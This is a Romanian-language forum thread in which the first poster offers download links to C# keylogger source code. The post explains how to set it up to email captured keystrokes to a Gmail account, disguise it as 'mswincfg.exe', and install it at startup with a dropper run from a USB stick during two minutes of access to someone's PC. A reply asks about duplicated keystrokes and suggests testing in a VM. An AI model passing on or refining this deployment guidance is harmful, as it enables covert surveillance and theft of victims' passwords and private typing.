Aghast Posted September 3, 2009 Report Posted September 3, 2009 Codul sursa la un keylogger scris in C#. Aici sunt surselehttp://rapidshare.com/files/274971017/surse.zipsauhttp://dl.fisier.ro/files/gck4f28go71o8ic/surse.zip.htmlNu vreau sa ma laud ca e 100% al meu, bucatele din cod o sa gasiti pe siteuri cu tutoriale si code snipets. Eu pur si simplu am luat niste exemple, le-am pus laolalta, am imbunatatit si am adaptat.Nu, nu e un keylogger care in descarci si pur si simplu te astepti sa mearga, trebui editata un pic sursa ca sa va faca pe plac.Oricum, idea de baza e sa inveti un pic de C#, sa vezi un principiu de functionare, alea alea. Pentru cei dezamagiti... sorry, atat am reusit sa fac.Stiu ca e putin culmea sa scrii keylogger in C#, mai ales daca ai nevoie de .NET Framework 2.0 pentru el.Nu este ceva super sofisticat, tot ce stie e monitorizarea tastelor si trimiterea unui raport pe o adresa Gmail. Keyloggerul vine cu 2 aplicatii auxiliare, un Dropper care il copiaza in sistem si in pune la Startup-ul sistemului si un Cleaner care il scoate daca este nevoie. Pe Windows Vista si Windows 7 aceste doua programe trebuie rulate ca Administrator deoarece Bill Gates a restrictionat un pic accesul la registri.Ce trebuie sa faceti ca sa mearga, simplu, va faceti un cont pe Gmail. Nu stiu daca trebuie sa lucrati prin setari, eu pe contul meu am dat enable la POP3 ca il mai folosesc si pentru altceva. Oricum, nu cred ca este necesar acest pas ca sa va mearga SMTP-ul.Dupa ce ati facut un cont de Gmail, editati fisierul "class.Config.cs" pentru a seta datele contului.Raportul este criptat ROT46(sa nu fie chiar plain text), daca nu va convine editati acelasi fisier "class.Config.cs" si in metoda "public static string Rot47(string str)" dati un "return str;"Pentru decriptare puteti folosi o pagina web care face acest lucru. De exemplu http://www.just-stuart.com/cgi-bin/ur13. Nu uitati e ROT46 nu ROT13.Sa nu uit, trebuie editat si dropperul, mai exact trebui setar numele sub care ati compilat keloggerul, eu l-am botezat "mswincfg.exe" sa sune putin a Micro$$oft.Cand terminati, dati un build la solutie, puneti keyloggerul si dropperul in acelasi director, il incarcati pe un stick cum am eu obiceiul si tot ce va trebuie e 2 minute de aces la un PC, bagati stickul si rulati dropper.Intrebari, nelamuriri, postati aici.
Alexander33 Posted May 19, 2010 Report Posted May 19, 2010 (edited) intrebare: cand trimite e-mail ?1.cand o sa modifici codul sursa si il cauti pana gasesti sa-ti bagi mailul tau.2.cand l-ai editat codul sursa poate ai gresit vreo litera si nu ti-l mai trimite.Un sfat cand te joci cu keyloggeri care nu distrug si altele:fa-ti un email separat de probe si infecteaza-te singur sau incearca cu VMWare.. ca daca ii citesti codul presupun ca iti dai si tu seama cum sa-l stergi...pS:poate pentru unii o sa li se para amuzant ca ma infectez singur dar altfel nu ai cum sa stii ca merge 100% sigurSi am si eu o intrebare...:de ce tot inregistreaza o face de 4 ori adica daca zic "unu" o sa-mi arate asa "uuuunnnnuuuu?:|:|" Edited May 21, 2010 by Alexander33
